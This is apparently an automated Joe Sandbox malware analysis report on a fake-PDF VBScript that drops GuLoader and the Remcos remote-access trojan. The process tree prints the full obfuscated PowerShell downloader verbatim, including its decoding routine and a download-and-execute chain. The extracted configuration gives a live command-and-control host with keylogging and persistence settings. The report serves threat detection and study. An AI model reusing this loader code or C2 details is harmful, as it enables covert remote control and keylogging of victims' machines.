Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
18000012550_20240930_0078864246#U00b7pdf.vbs

Overview

General Information

Sample name:18000012550_20240930_0078864246#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:18000012550_20240930_0078864246pdf.vbs
Analysis ID:1523161
MD5:89985981616f5fdef265814322d9735d
SHA1:a7a505cea8373907fec133bf34d8d38e86e4dfb2
SHA256:701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7400 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7632 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1849801435.0000000008250000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.1850125168.000000000B27C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7796.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_8036.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc770:$b2: ::FromBase64String(
              • 0xb7ee:$s1: -join
              • 0xfb0f:$s3: reverse
              • 0x4f9a:$s4: +=
              • 0x505c:$s4: +=
              • 0x9283:$s4: +=
              • 0xb3a0:$s4: +=
              • 0xb68a:$s4: +=
              • 0xb7d0:$s4: +=
              • 0x15b18:$s4: +=
              • 0x15b98:$s4: +=
              • 0x15c5e:$s4: +=
              • 0x15cde:$s4: +=
              • 0x15eb4:$s4: +=
              • 0x15f38:$s4: +=
              • 0xc013:$e4: Get-WmiObject
              • 0xc202:$e4: Get-Process
              • 0xc25a:$e4: Start-Process
              • 0x16779:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", ProcessId: 7676, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 216.58.206.78, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7400, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs", ProcessId: 7676, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro 